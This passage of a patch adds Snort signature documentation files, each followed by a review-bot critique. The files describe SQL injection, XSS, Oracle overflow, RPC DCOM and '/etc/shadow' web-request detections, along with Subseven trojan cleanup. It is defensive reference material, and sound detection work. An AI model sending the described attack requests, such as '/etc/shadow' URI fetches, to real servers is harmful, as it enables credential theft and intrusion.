+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using VCard PRO
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
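Review bot: the third paragraph of Detailed Information ("...validating the credentials of a client host...") is credential-bypass boilerplate that does not apply to an SQL injection through "cat_id"; drop it. Corrective Action should add the control that Attack Scenarios itself implies (validate or parameterize the "cat_id" input before it reaches the database) rather than only advising patches. Also fix "running ona web server" and the redundant "exploitation attempt has been attempted" in the Summary.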
--- /dev/null
+++ b/doc/signatures/1624.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid: 
+1624
+
+--
+Summary:
+This event is generated when activity relating to spurious ftp traffic is detected on the network.
+
+--
+Impact:
+Varies from information gathering to a serious compromise of an ftp server.
+
+--
+Detailed Information:
+FTP is used to transfer files between hosts. This event is indicative of spurious activity in FTP traffic between hosts.
+
+The event may be the result of a transfer of a known protected file or it could be an attempt to compromise the FTP server by overflowing a buffer in the FTP daemon or service.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using FTP.
+
+An attacker might utilize a vulnerability in an FTP daemon to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow access to FTP resources from hosts external to the protected network.
+
+Use secure shell (ssh) to transfer files as a replacement for FTP.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
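Review bot: this file has no "Affected Systems" section between Detailed Information and Attack Scenarios, unlike the other signature files in this patch; add one (for example "All systems running an FTP server") so the template stays consistent. Summary and Detailed Information describe "spurious ftp traffic" without saying what the rule actually matches (a transfer of a known protected file, or an oversized command that could overflow the daemon), which makes the "None Known" False Positives claim impossible to evaluate; name the pattern the rule looks for. Minor: "None Known" is capitalised differently from "None known." used elsewhere in the patch.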
--- /dev/null
+++ b/doc/signatures/1372.txt
@@ -0,0 +1,69 @@
+Rule:  
+
+Sid:
+1372
+
+--
+Summary:
+This event is generated when an attempt is made to retrieve a protected
+system file on a host via a web request.
+
+--
+Impact:
+Information Gathering.
+
+--
+Detailed Information:
+The shadow file usually found in the /etc/ directory on UNIX based
+systems, contains login information for users of a host.
+
+In this case, the rule will generate an event due to the attempted
+transfer of a shadow file. This file is generally used on muli-user
+systems to provide greater security for user passwords. This file should
+only be readable by the super user. If an attacker was successful in
+retrieving this file, they could then obtain valid login information for 
+the system by using widely available password cracking tools on the file.
+
+The file may also be used to garner information that may be used in
+brute force password guessing attacks against the host.
+
+--
+Affected Systems:
+	All UNIX based systems running a Web Server.
+ 
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains 
+'/etc/shadow'in the URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries 
+outside of it's designated web root or cgi-bin. This file may also be 
+requested on a command line should the attacker gain access to the 
+machine. Making the file read only by the superuser on the system will 
+disallow viewing of the file by other users.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
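Review bot: the "--" separator between "Rule:" and "Sid:" is missing at the top of this file, so anything that splits these files on "--" like the others will merge the two fields. Typos to fix in the same pass: "muli-user", "'/etc/shadow'in the URI" needs a space, and "outside of it's designated web root" should be "its". The Corrective Action advice is sound; the practical check that follows from it is that the web server process is not running as root, otherwise the read-only-by-superuser permission on the file gives no protection against this request.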
--- /dev/null
+++ b/doc/signatures/2653.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+2653
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in many
+useful tasks.  The "offline_og.begin_load" procedure is used for
+offline instantiation of master groups.  This procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "gname" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck632.html
+
+--
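Review bot: the "$ORACLE_PORTS" note in Detailed Information ("If you are running Oracle on a Windows server, make sure that the variable $ORACLE_PORTS is set to a value of "any"") is rule-configuration advice, not vulnerability detail, and it does not say why Windows deployments need "any"; move it to Corrective Action or a configuration note and state the reason. "a Oracle database implementation" should be "an Oracle database implementation", and the Affected Systems entry "Oracle 9i" is indented with spaces where the other files use a tab. Attack Scenarios correctly notes that the attacker needs a valid username and password; Ease of Attack says only "Simple." and should repeat that precondition so the exposure is not overstated.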
--- /dev/null
+++ b/doc/signatures/100000705.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000705
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "SmartSiteCMS" application running on a webserver. Access to the file "test.php" using a remote file being passed as the "root" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "root" parameter in the "test.php" script used by the "SmartSiteCMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using SmartSiteCMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
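Review bot: the third Detailed Information paragraph ("This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials...") and the Attack Scenarios text about supplying credentials are the generic CGI boilerplate and do not describe a remote file include; the scenario for this rule is the one the Summary already gives, a remote file passed in the "root" parameter of "test.php", so say that instead. Fix "running ona web server", remove the two empty lines at the top of the file, and add a blank line between "All systems running CGI applications using SmartSiteCMS" and the following "--" for consistency with the other files.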
--- /dev/null
+++ b/doc/signatures/891.txt
@@ -0,0 +1,76 @@
+Rule:
+
+--
+Sid:
+891
+
+--
+Summary:
+This event is generated when an attempt is made to access the file
+upload.pl via a web browser.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited
+by the attacker.
+
+This event indicates an attempt to access the CGI application upload.pl,
+this perl script can be used to upload files to a system and may be used
+by an attacker to place files of their choosing onto a server for
+further use.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Ensure that access controls are in place to limit access to the
+application to authorized users only.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
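Review bot: Impact says only "Information gathering." while Detailed Information states that upload.pl "can be used to upload files to a system and may be used by an attacker to place files of their choosing onto a server" and that code execution may follow; Impact should reflect that (system integrity compromise, possible execution of arbitrary code), as the comparable files in this patch do. Also fix "running ona web server".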
--- /dev/null
+++ b/doc/signatures/2064.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2064
+
+--
+Summary:
+file on a Lotus Domino Server.
+
+--
+Impact:
+Information disclosure
+
+--
+Detailed Information:
+Certain versions of Lotus Domino web servers do not correctly handle 
+requests for script files not specific to Lotus Domino.
+
+By using a dot in the filename an attacker may view the source of the 
+script and be presented with sensitive information embedded in the 
+script.
+
+--
+Affected Systems:
+Lotus Domino Server 5.0 and 6.0
+
+--
+Attack Scenarios:
+The attacker merely needs to make an HTTP request for the script and add
+a dot to the filename. This can be done using a browser.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor fixes
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/6841
+
+--
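Review bot: the Summary is truncated; it reads only "file on a Lotus Domino Server." and is missing the start of the sentence, so the event description is unusable as written. Restore the complete summary (what kind of attempt the rule generates an event for). Detailed Information should also say which script file types the "dot in the filename" request applies to, since the "None Known" False Positives entry depends on how narrowly the rule matches.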
--- /dev/null
+++ b/doc/signatures/1458.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1458
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Blackboard CourseInfo running on  a web server. 
+
+Any valid user is able to modify the contents of the database by
+supplying form values of their choosing to the perl scripts running the
+application.
+
+--
+Affected Systems:
+	Blackboard CourseInfo 4.0 for UNIX and Windws NT
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade the application to the latest non-affected version of the
+software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
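Review bot: the Summary calls this an "authentication vulnerability", but Detailed Information describes "Any valid user" modifying database contents by "supplying form values of their choosing", which is an authorization and input validation flaw rather than an authentication one; align the two sections. Fix "Windws NT" and the double space in "running on  a web server". Additional References is empty for a named product and version (Blackboard CourseInfo 4.0); add the vendor advisory or vulnerability database entry so the "Upgrade the application" advice can be acted on.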
--- /dev/null
+++ b/doc/signatures/3209.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3209
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
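Review bot: the Attack Scenarios text ("a request for a file with an overly long filename via a network share") does not obviously match Detailed Information ("malformed data via RPC" and "A malformed request to an RPC port"); either explain how the long filename reaches the DCOM RPC interface or describe the RPC request the rule matches. Additional References is empty for a vulnerability that has a vendor bulletin; add it. Typo: "Expoit code exists." The port-blocking advice in Corrective Action is explicitly for "external sources", so it would help to add that hosts inside the filtered network remain exposed until the patch is applied.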
--- /dev/null
+++ b/doc/signatures/902.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+902
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
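Review bot: neither Summary nor Detailed Information names the CGI script or request pattern that sid 902 matches; the text is the same generic CGI boilerplate that appears for sid 811 later in this patch. Add the specific script name so the "None known" False Positives claim can be checked against real traffic, and fix "running ona web server".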
--- /dev/null
+++ b/doc/signatures/100000649.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000649
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "MyPHP Guestbook" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "comment" parameter in the "index.php" script 
+used by the "MyPHP Guestbook" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using MyPHP Guestbook
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
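Review bot: Impact claims "unauthorized administrative access to the server" and "execution of arbitrary code" for what Detailed Information describes as a cross site scripting flaw in the "comment" parameter of "index.php"; XSS runs script in the victim's browser, so Impact should describe theft of session data or actions performed as the victim user, which is what the Attack Scenarios text ("a malicious link designed to steal information from a user") already says. Corrective Action could add output encoding of the "comment" value when it is rendered, the fix for this class of bug, alongside the patching advice. Also add a blank line after "All systems running CGI applications using MyPHP Guestbook" before the "--".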
+
--- /dev/null
+++ b/doc/signatures/2865.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2865
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_priority_varchar2
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
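Review bot: the procedure name is split across lines ("vulnerability in the procedure add_priority_varchar2" followed by ". This procedure is included in"), leaving a line that begins with a period; join these into one sentence. "Oracle Oracle9i" in Affected Systems repeats the vendor name. Several "-- " separator lines carry trailing whitespace, which matters for any tooling that matches the separator exactly. Additional References is empty although the vulnerability is specific (sys.dbms_repcat_conf.add_priority_varchar2) and Corrective Action tells the reader to "Apply the appropriate vendor supplied patch" without saying which; cite the vendor alert.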
--- /dev/null
+++ b/doc/signatures/2808.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2808
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure suspend_master_activity
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
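Review bot: same wrapping defect as 2865.txt: "vulnerability in the procedure suspend_master_activity" is followed by a line starting ". This procedure is included in", so join them into one sentence. Apart from the procedure and package names (suspend_master_activity in dbms_repcat) this file is identical to 2865.txt, including the duplicated "Oracle Oracle9i", the trailing whitespace on "-- " lines and the empty Additional References; fix those here as well and cite the vendor alert the "Apply the appropriate vendor supplied patch" advice refers to.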
--- /dev/null
+++ b/doc/signatures/811.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+811
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
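Review bot: apart from the sid, this file is word for word the same as 902.txt earlier in this patch, and like that file it never says which CGI script or URI sid 811 matches. Add the specific target so analysts can tell the two events apart and evaluate the "None known" False Positives claim, and fix "running ona web server".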
--- /dev/null
+++ b/doc/signatures/1048.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1048
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
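Review bot: the text never identifies what request pattern sid 1048 matches; "Many known vulnerabilities exist for each implementation and the attack scenarios are legion" is not documentation of a specific rule, and "All systems using a web server." as Affected Systems follows from that vagueness. Name the script, path or request feature the rule looks for so the Ease of Attack ("Exploits exist.") and False Positives entries have something to refer to.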
--- /dev/null
+++ b/doc/signatures/3377.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3377
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
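Review bot: this file is identical to 3209.txt earlier in this patch except for the sid; if sid 3377 covers a different RPC interface, transport or request shape, say so in Detailed Information so an analyst can tell why two separate events fire. The same issues carry over: the Attack Scenarios "overly long filename via a network share" does not obviously match the "malformed request to an RPC port" in Detailed Information, Additional References is empty, and "Expoit code exists." is a typo.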
--- /dev/null
+++ b/doc/signatures/2100.txt
@@ -0,0 +1,123 @@
+Rule:
+
+--
+Sid: 2100
+
+--
+Summary:
+Subseven 2.1 Gold is a Trojan Horse offering complete control of the 
+infected host.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a 
+compromise of all resources the machine is connected to. This Trojan 
+also has the ability to delete data, steal passwords and disable the 
+machine. Other versions are capable of launching DDoS attacks.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+
+No other systems are affected. This is a windows executable that makes 
+changes to the system registry, Win.ini and System.ini. When first 
+executed the Trojan listens on either port 27374 or port 1243.
+
+Subseven is an improved version of the Netbus Trojan (see sids 114, 
+115), Subseven 2.1 Gold is an improved version of Subseven that 
+affects Windows 95 and 98 implementations.
+
+The Trojan changes system startup files and registry settings to add the
+Subseven server to programs normally started on boot.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This 
+compromise can be in the form of a Win32 installation program that may 
+use the extension ".jpg" or ".bmp" when delivered via e-mail for 
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. 
+
+Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+This is a particularly difficult Trojan to remove and should only be 
+attempted by an experienced Windows Administrator.
+
+Edit the system registry to remove the extra keys or restore a 
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+  HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
+    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
+
+Registry key added:
+
+	Winloader
+
+Also affected:
+
+	HKEY_CLASSES_ROOT\exefile\shell\open\command
+
+This registry key should be blank, i.e. ""
+
+The registry should also be searched for the entry  
+
+  HKEY_CLASSES_ROOT\.dl 
+
+if this exists it should be deleted.
+
+This Trojan may also be started from the files win.ini and system.ini, 
+remove the entry run=MSREXE.exe and change the line 
+shell=Explorer.exe MSREXE.exe to the default value shell=explorer.exe.
+
+Removal of the Trojan is also required, look for the file "MSREXE.exe" 
+in the <drive>:\Windows\ or <drive>:\Windows\System\ folders.
+
+Additionally, the files "RUN.EXE", "WINDOS.EXE" or "MUEEXE.EXE" may also
+be present on the system and should be removed along with any references
+to them in the start up locations in the same manner as for MSREXE.exe.
+
